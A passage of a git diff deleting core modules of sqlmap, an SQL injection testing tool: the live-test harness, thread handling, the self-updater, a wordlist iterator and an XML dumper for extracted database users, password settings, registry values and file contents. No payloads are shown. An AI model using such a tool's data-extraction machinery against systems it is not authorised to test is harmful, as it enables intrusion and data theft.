(time.strftime("%X"), status)) - - clearConsoleLine() - if retVal: - logger.info("smoke test final result: PASSED") - else: - logger.error("smoke test final result: FAILED") - - return retVal - -def adjustValueType(tagName, value): - for family in optDict.keys(): - for name, type_ in optDict[family].items(): - if type(type_) == tuple: - type_ = type_[0] - if tagName == name: - if type_ == "boolean": - value = (value == "True") - elif type_ == "integer": - value = int(value) - elif type_ == "float": - value = float(value) - break - return value - -def liveTest(): - """ - Runs the test of a program against the live testing environment - """ - - retVal = True - count = 0 - global_ = {} - vars_ = {} - - livetests = readXmlFile(paths.LIVE_TESTS_XML) - length = len(livetests.getElementsByTagName("case")) - - element = livetests.getElementsByTagName("global") - if element: - for item in element: - for child in item.childNodes: - if child.nodeType == child.ELEMENT_NODE and child.hasAttribute("value"): - global_[child.tagName] = adjustValueType(child.tagName, child.getAttribute("value")) - - element = livetests.getElementsByTagName("vars") - if element: - for item in element: - for child in item.childNodes: - if child.nodeType == child.ELEMENT_NODE and child.hasAttribute("value"): - var = child.getAttribute("value") - vars_[child.tagName] = randomStr(6) if var == "random" else var - - for case in livetests.getElementsByTagName("case"): - parse_from_console_output = False - count += 1 - name = None - parse = [] - switches = dict(global_) - value = "" - vulnerable = True - result = None - - if case.hasAttribute("name"): - name = case.getAttribute("name") - - if conf.runCase and ((conf.runCase.isdigit() and conf.runCase != count) or not re.search(conf.runCase, name, re.DOTALL)): - continue - - if case.getElementsByTagName("switches"): - for child in case.getElementsByTagName("switches")[0].childNodes: - if child.nodeType == child.ELEMENT_NODE and child.hasAttribute("value"): - value = replaceVars(child.getAttribute("value"), vars_) - switches[child.tagName] = adjustValueType(child.tagName, value) - - if case.getElementsByTagName("parse"): - for item in case.getElementsByTagName("parse")[0].getElementsByTagName("item"): - if item.hasAttribute("value"): - value = replaceVars(item.getAttribute("value"), vars_) - - if item.hasAttribute("console_output"): - parse_from_console_output = bool(item.getAttribute("console_output")) - - parse.append((value, parse_from_console_output)) - - conf.verbose = global_.get("verbose", 1) - setVerbosity() - - msg = "running live test case: %s (%d/%d)" % (name, count, length) - logger.info(msg) - - initCase(switches, count) - - test_case_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "test_case"), "wb", UNICODE_ENCODING) - test_case_fd.write("%s\n" % name) - - try: - result = runCase(parse) - except SqlmapNotVulnerableException: - vulnerable = False - finally: - conf.verbose = global_.get("verbose", 1) - setVerbosity() - - if result is True: - logger.info("test passed") - cleanCase() - else: - errMsg = "test failed" - - if Failures.failedItems: - errMsg += " at parsing items: %s" % ", ".join(i for i in Failures.failedItems) - - errMsg += " - scan folder: %s" % paths.SQLMAP_OUTPUT_PATH - errMsg += " - traceback: %s" % bool(Failures.failedTraceBack) - - if not vulnerable: - errMsg += " - SQL injection not detected" - - logger.error(errMsg) - test_case_fd.write("%s\n" % errMsg) - - if Failures.failedParseOn: - console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING) - console_output_fd.write(Failures.failedParseOn) - console_output_fd.close() - - if Failures.failedTraceBack: - traceback_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "traceback"), "wb", UNICODE_ENCODING) - traceback_fd.write(Failures.failedTraceBack) - traceback_fd.close() - - beep() - - if conf.stopFail is True: - return retVal - - test_case_fd.close() - retVal &= bool(result) - - dataToStdout("\n") - - if retVal: - logger.info("live test final result: PASSED") - else: - logger.error("live test final result: FAILED") - - return retVal - -def initCase(switches, count): - Failures.failedItems = [] - Failures.failedParseOn = None - Failures.failedTraceBack = None - - paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="sqlmaptest-%d-" % count) - paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") - paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") - - logger.debug("using output directory '%s' for this test case" % paths.SQLMAP_OUTPUT_PATH) - - LOGGER_HANDLER.stream = sys.stdout = tempfile.SpooledTemporaryFile(max_size=0, mode="w+b", prefix="sqlmapstdout-") - - cmdLineOptions = cmdLineParser() - - if switches: - for key, value in switches.items(): - if key in cmdLineOptions.__dict__: - cmdLineOptions.__dict__[key] = value - - initOptions(cmdLineOptions, True) - init() - -def cleanCase(): - shutil.rmtree(paths.SQLMAP_OUTPUT_PATH, True) - -def runCase(parse): - retVal = True - handled_exception = None - unhandled_exception = None - result = False - console = "" - - try: - result = start() - except KeyboardInterrupt: - pass - except SqlmapBaseException, e: - handled_exception = e - except Exception, e: - unhandled_exception = e - finally: - sys.stdout.seek(0) - console = sys.stdout.read() - LOGGER_HANDLER.stream = sys.stdout = sys.__stdout__ - - if unhandled_exception: - Failures.failedTraceBack = "unhandled exception: %s" % str(traceback.format_exc()) - retVal = None - elif handled_exception: - Failures.failedTraceBack = "handled exception: %s" % str(traceback.format_exc()) - retVal = None - elif result is False: # this means no SQL injection has been detected - if None, ignore - retVal = False - - console = getUnicode(console, encoding=sys.stdin.encoding) - - if parse and retVal: - with codecs.open(conf.dumper.getOutputFile(), "rb", UNICODE_ENCODING) as f: - content = f.read() - - for item, parse_from_console_output in parse: - parse_on = console if parse_from_console_output else content - - if item.startswith("r'") and item.endswith("'"): - if not re.search(item[2:-1], parse_on, re.DOTALL): - retVal = None - Failures.failedItems.append(item) - - elif item not in parse_on: - retVal = None - Failures.failedItems.append(item) - - if Failures.failedItems: - Failures.failedParseOn = console - - elif retVal is False: - Failures.failedParseOn = console - - return retVal - -def replaceVars(item, vars_): - retVal = item - - if item and vars_: - for var in re.findall("\$\{([^}]+)\}", item): - if var in vars_: - retVal = retVal.replace("${%s}" % var, vars_[var]) - - return retVal diff --git a/lib/core/threads.py b/lib/core/threads.py deleted file mode 100644 index 4fa68bfb..00000000 --- a/lib/core/threads.py +++ /dev/null @@ -1,209 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import difflib -import threading -import time -import traceback - -from thread import error as ThreadError - -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.datatype import AttribDict -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapThreadException -from lib.core.exception import SqlmapValueException -from lib.core.settings import MAX_NUMBER_OF_THREADS -from lib.core.settings import PYVERSION - -shared = AttribDict() - -class _ThreadData(threading.local): - """ - Represents thread independent data - """ - - def __init__(self): - self.reset() - - def reset(self): - """ - Resets thread data model - """ - - self.disableStdOut = False - self.hashDBCursor = None - self.inTransaction = False - self.lastComparisonPage = None - self.lastComparisonHeaders = None - self.lastErrorPage = None - self.lastHTTPError = None - self.lastRedirectMsg = None - self.lastQueryDuration = 0 - self.lastPage = None - self.lastRequestMsg = None - self.lastRequestUID = 0 - self.lastRedirectURL = None - self.resumed = False - self.retriesCount = 0 - self.seqMatcher = difflib.SequenceMatcher(None) - self.shared = shared - self.valueStack = [] - -ThreadData = _ThreadData() - -def getCurrentThreadUID(): - return hash(threading.currentThread()) - -def readInput(message, default=None): - # It will be overwritten by original from lib.core.common - pass - -def getCurrentThreadData(): - """ - Returns current thread's local data - """ - - global ThreadData - - return ThreadData - -def getCurrentThreadName(): - """ - Returns current's thread name - """ - - return threading.current_thread().getName() - -def exceptionHandledFunction(threadFunction): - try: - threadFunction() - except KeyboardInterrupt: - kb.threadContinue = False - kb.threadException = True - raise - except Exception, ex: - # thread is just going to be silently killed - logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) - -def setDaemon(thread): - # Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation - if PYVERSION >= "2.6": - thread.daemon = True - else: - thread.setDaemon(True) - -def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardException=True, threadChoice=False, startThreadMsg=True): - threads = [] - - kb.multiThreadMode = True - kb.threadContinue = True - kb.threadException = False - - if threadChoice and numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)): - while True: - message = "please enter number of threads? [Enter for %d (current)] " % numThreads - choice = readInput(message, default=str(numThreads)) - if choice: - skipThreadCheck = False - if choice.endswith('!'): - choice = choice[:-1] - skipThreadCheck = True - if choice.isdigit(): - if int(choice) > MAX_NUMBER_OF_THREADS and not skipThreadCheck: - errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS - logger.critical(errMsg) - else: - conf.threads = numThreads = int(choice) - break - - if numThreads == 1: - warnMsg = "running in a single-thread mode. This could take a while" - logger.warn(warnMsg) - - try: - if numThreads > 1: - if startThreadMsg: - infoMsg = "starting %d threads" % numThreads - logger.info(infoMsg) - else: - threadFunction() - return - - # Start the threads - for numThread in xrange(numThreads): - thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[threadFunction]) - - setDaemon(thread) - - try: - thread.start() - except ThreadError, ex: - errMsg = "error occurred while starting new thread ('%s')" % ex.message - logger.critical(errMsg) - break - - threads.append(thread) - - # And wait for them to all finish - alive = True - while alive: - alive = False - for thread in threads: - if thread.isAlive(): - alive = True - time.sleep(0.1) - - except KeyboardInterrupt: - print - kb.threadContinue = False - kb.threadException = True - - if numThreads > 1: - logger.info("waiting for threads to finish (Ctrl+C was pressed)") - try: - while (threading.activeCount() > 1): - pass - - except KeyboardInterrupt: - raise SqlmapThreadException("user aborted (Ctrl+C was pressed multiple times)") - - if forwardException: - raise - - except (SqlmapConnectionException, SqlmapValueException), ex: - print - kb.threadException = True - logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) - - except: - from lib.core.common import unhandledExceptionMessage - - print - kb.threadException = True - errMsg = unhandledExceptionMessage() - logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) - traceback.print_exc() - - finally: - kb.multiThreadMode = False - kb.bruteMode = False - kb.threadContinue = True - kb.threadException = False - - for lock in kb.locks.values(): - if lock.locked_lock(): - lock.release() - - if conf.get("hashDB"): - conf.hashDB.flush(True) - - if cleanupFunction: - cleanupFunction() diff --git a/lib/core/unescaper.py b/lib/core/unescaper.py deleted file mode 100644 index 3af78f92..00000000 --- a/lib/core/unescaper.py +++ /dev/null @@ -1,34 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.data import conf -from lib.core.datatype import AttribDict -from lib.core.settings import EXCLUDE_UNESCAPE - -class Unescaper(AttribDict): - def escape(self, expression, quote=True, dbms=None): - if conf.noEscape: - return expression - - if expression is None: - return expression - - for exclude in EXCLUDE_UNESCAPE: - if exclude in expression: - return expression - - identifiedDbms = Backend.getIdentifiedDbms() - - if dbms is not None: - return self[dbms](expression, quote=quote) - elif identifiedDbms is not None: - return self[identifiedDbms](expression, quote=quote) - else: - return expression - -unescaper = Unescaper() diff --git a/lib/core/update.py b/lib/core/update.py deleted file mode 100644 index 9be92a53..00000000 --- a/lib/core/update.py +++ /dev/null @@ -1,77 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re -import time - -from subprocess import PIPE -from subprocess import Popen as execute - -from lib.core.common import dataToStdout -from lib.core.common import getSafeExString -from lib.core.common import pollProcess -from lib.core.data import conf -from lib.core.data import logger -from lib.core.data import paths -from lib.core.revision import getRevisionNumber -from lib.core.settings import GIT_REPOSITORY -from lib.core.settings import IS_WIN - -def update(): - if not conf.updateAll: - return - - success = False - - if not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")): - errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository " - errMsg += "from GitHub (e.g. 'git clone https://github.com/sqlmapproject/sqlmap.git sqlmap')" - logger.error(errMsg) - else: - infoMsg = "updating sqlmap to the latest development version from the " - infoMsg += "GitHub repository" - logger.info(infoMsg) - - debugMsg = "sqlmap will try to update itself using 'git' command" - logger.debug(debugMsg) - - dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X")) - - try: - process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE, cwd=paths.SQLMAP_ROOT_PATH) - pollProcess(process, True) - stdout, stderr = process.communicate() - success = not process.returncode - except (IOError, OSError), ex: - success = False - stderr = getSafeExString(ex) - - if success: - import lib.core.settings - _ = lib.core.settings.REVISION = getRevisionNumber() - logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", _)) - else: - if "Not a git repository" in stderr: - errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository " - errMsg += "from GitHub (e.g. 'git clone https://github.com/sqlmapproject/sqlmap.git sqlmap')" - logger.error(errMsg) - else: - logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) - - if not success: - if IS_WIN: - infoMsg = "for Windows platform it's recommended " - infoMsg += "to use a GitHub for Windows client for updating " - infoMsg += "purposes (http://windows.github.com/) or just " - infoMsg += "download the latest snapshot from " - infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads" - else: - infoMsg = "for Linux platform it's required " - infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')" - - logger.info(infoMsg) diff --git a/lib/core/wordlist.py b/lib/core/wordlist.py deleted file mode 100644 index 13e763b1..00000000 --- a/lib/core/wordlist.py +++ /dev/null @@ -1,87 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import zipfile - -from lib.core.common import getSafeExString -from lib.core.exception import SqlmapDataException -from lib.core.exception import SqlmapInstallationException -from lib.core.settings import UNICODE_ENCODING - -class Wordlist(object): - """ - Iterator for looping over a large dictionaries - """ - - def __init__(self, filenames, proc_id=None, proc_count=None, custom=None): - self.filenames = filenames - self.fp = None - self.index = 0 - self.counter = -1 - self.current = None - self.iter = None - self.custom = custom or [] - self.proc_id = proc_id - self.proc_count = proc_count - self.adjust() - - def __iter__(self): - return self - - def adjust(self): - self.closeFP() - if self.index > len(self.filenames): - raise StopIteration - elif self.index == len(self.filenames): - self.iter = iter(self.custom) - else: - self.current = self.filenames[self.index] - if os.path.splitext(self.current)[1].lower() == ".zip": - try: - _ = zipfile.ZipFile(self.current, 'r') - except zipfile.error, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) - errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg - if len(_.namelist()) == 0: - errMsg = "no file(s) inside '%s'" % self.current - raise SqlmapDataException(errMsg) - self.fp = _.open(_.namelist()[0]) - else: - self.fp = open(self.current, 'r') - self.iter = iter(self.fp) - - self.index += 1 - - def closeFP(self): - if self.fp: - self.fp.close() - self.fp = None - - def next(self): - retVal = None - while True: - self.counter += 1 - try: - retVal = self.iter.next().rstrip() - except zipfile.error, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) - errMsg += "sure that you haven't made any changes to it" - raise SqlmapInstallationException, errMsg - except StopIteration: - self.adjust() - retVal = self.iter.next().rstrip() - if not self.proc_count or self.counter % self.proc_count == self.proc_id: - break - return retVal - - def rewind(self): - self.index = 0 - self.adjust() diff --git a/lib/core/xmldump.py b/lib/core/xmldump.py deleted file mode 100644 index e0c37796..00000000 --- a/lib/core/xmldump.py +++ /dev/null @@ -1,536 +0,0 @@ -#!/usr/bin/env python - -import codecs -import os -import re -import xml - -import xml.sax.saxutils as saxutils - -from lib.core.common import getUnicode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.exception import SqlmapFilePathException -from lib.core.settings import UNICODE_ENCODING -from thirdparty.prettyprint import prettyprint -from xml.dom.minidom import Document -from xml.parsers.expat import ExpatError - -TECHNIC_ELEM_NAME = "Technic" -TECHNICS_ELEM_NAME = "Technics" -BANNER_ELEM_NAME = "Banner" -COLUMNS_ELEM_NAME = "DatabaseColumns" -COLUMN_ELEM_NAME = "Column" -CELL_ELEM_NAME = "Cell" -COLUMN_ATTR = "column" -ROW_ELEM_NAME = "Row" -TABLES_ELEM_NAME = "tables" -DATABASE_COLUMNS_ELEM = "DB" -DB_TABLES_ELEM_NAME = "DBTables" -DB_TABLE_ELEM_NAME = "DBTable" -IS_DBA_ELEM_NAME = "isDBA" -FILE_CONTENT_ELEM_NAME = "FileContent" -DB_ATTR = "db" -UNKNOWN_COLUMN_TYPE = "unknown" -USER_SETTINGS_ELEM_NAME = "UserSettings" -USER_SETTING_ELEM_NAME = "UserSetting" -USERS_ELEM_NAME = "Users" -USER_ELEM_NAME = "User" -DB_USER_ELEM_NAME = "DBUser" -SETTINGS_ELEM_NAME = "Settings" -DBS_ELEM_NAME = "DBs" -DB_NAME_ELEM_NAME = "DBName" -DATABASE_ELEM_NAME = "Database" -TABLE_ELEM_NAME = "Table" -DB_TABLE_VALUES_ELEM_NAME = "DBTableValues" -DB_VALUES_ELEM = "DBValues" -QUERIES_ELEM_NAME = "Queries" -QUERY_ELEM_NAME = "Query" -REGISTERY_ENTRIES_ELEM_NAME = "RegistryEntries" -REGISTER_DATA_ELEM_NAME = "RegisterData" -DEFAULT_DB = "All" -MESSAGE_ELEM = "Message" -MESSAGES_ELEM_NAME = "Messages" -ERROR_ELEM_NAME = "Error" -LST_ELEM_NAME = "List" -LSTS_ELEM_NAME = "Lists" -CURRENT_USER_ELEM_NAME = "CurrentUser" -CURRENT_DB_ELEM_NAME = "CurrentDB" -MEMBER_ELEM = "Member" -ADMIN_USER = "Admin" -REGULAR_USER = "User" -STATUS_ELEM_NAME = "Status" -RESULTS_ELEM_NAME = "Results" -UNHANDLED_PROBLEM_TYPE = "Unhandled" -NAME_ATTR = "name" -TYPE_ATTR = "type" -VALUE_ATTR = "value" -SUCESS_ATTR = "success" -NAME_SPACE_ATTR = 'http://www.w3.org/2001/XMLSchema-instance' -XMLNS_ATTR = "xmlns:xsi" -SCHEME_NAME = "sqlmap.xsd" -SCHEME_NAME_ATTR = "xsi:noNamespaceSchemaLocation" -CHARACTERS_TO_ENCODE = range(32) + range(127, 256) -ENTITIES = {'"': '"', "'": "'"} - -class XMLDump(object): - ''' - This class purpose is to dump the data into an xml Format. - The format of the xml file is described in the scheme file xml/sqlmap.xsd - ''' - - def __init__(self): - self._outputFile = None - self._outputFP = None - self.__root = None - self.__doc = Document() - - def _addToRoot(self, element): - ''' - Adds element to the root element - ''' - self.__root.appendChild(element) - - def __write(self, data, n=True): - ''' - Writes the data into the file - ''' - if n: - self._outputFP.write("%s\n" % data) - else: - self._outputFP.write("%s " % data) - - self._outputFP.flush() - - kb.dataOutputFlag = True - - def _getRootChild(self, elemName): - ''' - Returns the child of the root with the described name - ''' - elements = self.__root.getElementsByTagName(elemName) - if elements: - return elements[0] - - return elements - - def _createTextNode(self, data): - ''' - Creates a text node with utf8 data inside. - The text is escaped to an fit the xml text Format. - ''' - if data is None: - return self.__doc.createTextNode(u'') - else: - escaped_data = saxutils.escape(data, ENTITIES) - return self.__doc.createTextNode(escaped_data) - - def _createAttribute(self, attrName, attrValue): - ''' - Creates an attribute node with utf8 data inside. - The text is escaped to an fit the xml text Format. - ''' - attr = self.__doc.createAttribute(attrName) - if attrValue is None: - attr.nodeValue = u'' - else: - attr.nodeValue = getUnicode(attrValue) - return attr - - def string(self, header, data, sort=True): - ''' - Adds string element to the xml. - ''' - if isinstance(data, (list, tuple, set)): - self.lister(header, data, sort) - return - - messagesElem = self._getRootChild(MESSAGES_ELEM_NAME) - if (not(messagesElem)): - messagesElem = self.__doc.createElement(MESSAGES_ELEM_NAME) - self._addToRoot(messagesElem) - - if data: - data = self._formatString(data) - else: - data = "" - - elem = self.__doc.createElement(MESSAGE_ELEM) - elem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - elem.appendChild(self._createTextNode(data)) - messagesElem.appendChild(elem) - - def lister(self, header, elements, sort=True): - ''' - Adds information formatted as list element - ''' - lstElem = self.__doc.createElement(LST_ELEM_NAME) - lstElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - if elements: - if sort: - try: - elements = set(elements) - elements = list(elements) - elements.sort(key=lambda x: x.lower()) - except: - pass - - for element in elements: - memberElem = self.__doc.createElement(MEMBER_ELEM) - lstElem.appendChild(memberElem) - if isinstance(element, basestring): - memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "string")) - memberElem.appendChild(self._createTextNode(element)) - elif isinstance(element, (list, tuple, set)): - memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "list")) - for e in element: - memberElemStr = self.__doc.createElement(MEMBER_ELEM) - memberElemStr.setAttributeNode(self._createAttribute(TYPE_ATTR, "string")) - memberElemStr.appendChild(self._createTextNode(getUnicode(e))) - memberElem.appendChild(memberElemStr) - listsElem = self._getRootChild(LSTS_ELEM_NAME) - if not(listsElem): - listsElem = self.__doc.createElement(LSTS_ELEM_NAME) - self._addToRoot(listsElem) - listsElem.appendChild(lstElem) - - def technic(self, technicType, data): - ''' - Adds information about the technic used to extract data from the db - ''' - technicElem = self.__doc.createElement(TECHNIC_ELEM_NAME) - technicElem.setAttributeNode(self._createAttribute(TYPE_ATTR, technicType)) - textNode = self._createTextNode(data) - technicElem.appendChild(textNode) - technicsElem = self._getRootChild(TECHNICS_ELEM_NAME) - if not(technicsElem): - technicsElem = self.__doc.createElement(TECHNICS_ELEM_NAME) - self._addToRoot(technicsElem) - technicsElem.appendChild(technicElem) - - def banner(self, data): - ''' - Adds information about the database banner to the xml. - The banner contains information about the type and the version of the database. - ''' - bannerElem = self.__doc.createElement(BANNER_ELEM_NAME) - bannerElem.appendChild(self._createTextNode(data)) - self._addToRoot(bannerElem) - - def currentUser(self, data): - ''' - Adds information about the current database user to the xml - ''' - currentUserElem = self.__doc.createElement(CURRENT_USER_ELEM_NAME) - textNode = self._createTextNode(data) - currentUserElem.appendChild(textNode) - self._addToRoot(currentUserElem) - - def currentDb(self, data): - ''' - Adds information about the current database is use to the xml - ''' - currentDBElem = self.__doc.createElement(CURRENT_DB_ELEM_NAME) - textNode = self._createTextNode(data) - currentDBElem.appendChild(textNode) - self._addToRoot(currentDBElem) - - def dba(self, isDBA): - ''' - Adds information to the xml that indicates whether the user has DBA privileges - ''' - isDBAElem = self.__doc.createElement(IS_DBA_ELEM_NAME) - isDBAElem.setAttributeNode(self._createAttribute(VALUE_ATTR, getUnicode(isDBA))) - self._addToRoot(isDBAElem) - - def users(self, users): - ''' - Adds a list of the existing users to the xml - ''' - usersElem = self.__doc.createElement(USERS_ELEM_NAME) - if isinstance(users, basestring): - users = [users] - if users: - for user in users: - userElem = self.__doc.createElement(DB_USER_ELEM_NAME) - usersElem.appendChild(userElem) - userElem.appendChild(self._createTextNode(user)) - self._addToRoot(usersElem) - - def dbs(self, dbs): - ''' - Adds a list of the existing databases to the xml - ''' - dbsElem = self.__doc.createElement(DBS_ELEM_NAME) - if dbs: - for db in dbs: - dbElem = self.__doc.createElement(DB_NAME_ELEM_NAME) - dbsElem.appendChild(dbElem) - dbElem.appendChild(self._createTextNode(db)) - self._addToRoot(dbsElem) - - def userSettings(self, header, userSettings, subHeader): - ''' - Adds information about the user's settings to the xml. - The information can be user's passwords, privileges and etc.. - ''' - self._areAdmins = set() - userSettingsElem = self._getRootChild(USER_SETTINGS_ELEM_NAME) - if (not(userSettingsElem)): - userSettingsElem = self.__doc.createElement(USER_SETTINGS_ELEM_NAME) - self._addToRoot(userSettingsElem) - - userSettingElem = self.__doc.createElement(USER_SETTING_ELEM_NAME) - userSettingElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - - if isinstance(userSettings, (tuple, list, set)): - self._areAdmins = userSettings[1] - userSettings = userSettings[0] - - users = userSettings.keys() - users.sort(key=lambda x: x.lower()) - - for user in users: - userElem = self.__doc.createElement(USER_ELEM_NAME) - userSettingElem.appendChild(userElem) - if user in self._areAdmins: - userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, ADMIN_USER)) - else: - userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, REGULAR_USER)) - - settings = userSettings[user] - - settings.sort() - - for setting in settings: - settingsElem = self.__doc.createElement(SETTINGS_ELEM_NAME) - settingsElem.setAttributeNode(self._createAttribute(TYPE_ATTR, subHeader)) - settingTextNode = self._createTextNode(setting) - settingsElem.appendChild(settingTextNode) - userElem.appendChild(settingsElem) - userSettingsElem.appendChild(userSettingElem) - - def dbTables(self, dbTables): - ''' - Adds information of the existing db tables to the xml - ''' - if not isinstance(dbTables, dict): - self.string(TABLES_ELEM_NAME, dbTables) - return - - dbTablesElem = self.__doc.createElement(DB_TABLES_ELEM_NAME) - - for db, tables in dbTables.items(): - tables.sort(key=lambda x: x.lower()) - dbElem = self.__doc.createElement(DATABASE_ELEM_NAME) - dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db)) - dbTablesElem.appendChild(dbElem) - for table in tables: - tableElem = self.__doc.createElement(DB_TABLE_ELEM_NAME) - tableElem.appendChild(self._createTextNode(table)) - dbElem.appendChild(tableElem) - self._addToRoot(dbTablesElem) - - def dbTableColumns(self, tableColumns): - ''' - Adds information about the columns of the existing tables to the xml - ''' - - columnsElem = self._getRootChild(COLUMNS_ELEM_NAME) - if not(columnsElem): - columnsElem = self.__doc.createElement(COLUMNS_ELEM_NAME) - - for db, tables in tableColumns.items(): - if not db: - db = DEFAULT_DB - dbElem = self.__doc.createElement(DATABASE_COLUMNS_ELEM) - dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db)) - columnsElem.appendChild(dbElem) - - for table, columns in tables.items(): - tableElem = self.__doc.createElement(TABLE_ELEM_NAME) - tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table)) - - colList = columns.keys() - colList.sort(key=lambda x: x.lower()) - - for column in colList: - colType = columns[column] - colElem = self.__doc.createElement(COLUMN_ELEM_NAME) - if colType is not None: - colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, colType)) - else: - colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNKNOWN_COLUMN_TYPE)) - colElem.appendChild(self._createTextNode(column)) - tableElem.appendChild(colElem) - - self._addToRoot(columnsElem) - - def dbTableValues(self, tableValues): - ''' - Adds the values of specific table to the xml. - The values are organized according to the relevant row and column. - ''' - tableElem = self.__doc.createElement(DB_TABLE_VALUES_ELEM_NAME) - if (tableValues is not None): - db = tableValues["__infos__"]["db"] - if not db: - db = "All" - table = tableValues["__infos__"]["table"] - - count = int(tableValues["__infos__"]["count"]) - columns = tableValues.keys() - columns.sort(key=lambda x: x.lower()) - - tableElem.setAttributeNode(self._createAttribute(DB_ATTR, db)) - tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table)) - - for i in range(count): - rowElem = self.__doc.createElement(ROW_ELEM_NAME) - tableElem.appendChild(rowElem) - for column in columns: - if column != "__infos__": - info = tableValues[column] - value = info["values"][i] - - if re.search("^[\ *]*$", value): - value = "NULL" - - cellElem = self.__doc.createElement(CELL_ELEM_NAME) - cellElem.setAttributeNode(self._createAttribute(COLUMN_ATTR, column)) - cellElem.appendChild(self._createTextNode(value)) - rowElem.appendChild(cellElem) - - dbValuesElem = self._getRootChild(DB_VALUES_ELEM) - if (not(dbValuesElem)): - dbValuesElem = self.__doc.createElement(DB_VALUES_ELEM) - self._addToRoot(dbValuesElem) - - dbValuesElem.appendChild(tableElem) - - logger.info("Table '%s.%s' dumped to XML file" % (db, table)) - - def dbColumns(self, dbColumns, colConsider, dbs): - ''' - Adds information about the columns - ''' - for column in dbColumns.keys(): - printDbs = {} - for db, tblData in dbs.items(): - for tbl, colData in tblData.items(): - for col, dataType in colData.items(): - if column in col: - if db in printDbs: - if tbl in printDbs[db]: - printDbs[db][tbl][col] = dataType - else: - printDbs[db][tbl] = {col: dataType} - else: - printDbs[db] = {} - printDbs[db][tbl] = {col: dataType} - - continue - - self.dbTableColumns(printDbs) - - def query(self, query, queryRes): - ''' - Adds details of an executed query to the xml. - The query details are the query itself and its results. - ''' - queryElem = self.__doc.createElement(QUERY_ELEM_NAME) - queryElem.setAttributeNode(self._createAttribute(VALUE_ATTR, query)) - queryElem.appendChild(self._createTextNode(queryRes)) - queriesElem = self._getRootChild(QUERIES_ELEM_NAME) - if (not(queriesElem)): - queriesElem = self.__doc.createElement(QUERIES_ELEM_NAME) - self._addToRoot(queriesElem) - queriesElem.appendChild(queryElem) - - def registerValue(self, registerData): - ''' - Adds information about an extracted registry key to the xml - ''' - registerElem = self.__doc.createElement(REGISTER_DATA_ELEM_NAME) - registerElem.appendChild(self._createTextNode(registerData)) - registriesElem = self._getRootChild(REGISTERY_ENTRIES_ELEM_NAME) - if (not(registriesElem)): - registriesElem = self.__doc.createElement(REGISTERY_ENTRIES_ELEM_NAME) - self._addToRoot(registriesElem) - registriesElem.appendChild(registerElem) - - def rFile(self, filePath, data): - ''' - Adds an extracted file's content to the xml - ''' - fileContentElem = self.__doc.createElement(FILE_CONTENT_ELEM_NAME) - fileContentElem.setAttributeNode(self._createAttribute(NAME_ATTR, filePath)) - fileContentElem.appendChild(self._createTextNode(data)) - self._addToRoot(fileContentElem) - - def setOutputFile(self): - ''' - Initiates the xml file from the configuration. - ''' - if (conf.xmlFile): - try: - self._outputFile = conf.xmlFile - self.__root = None - - if os.path.exists(self._outputFile): - try: - self.__doc = xml.dom.minidom.parse(self._outputFile) - self.__root = self.__doc.childNodes[0] - except ExpatError: - 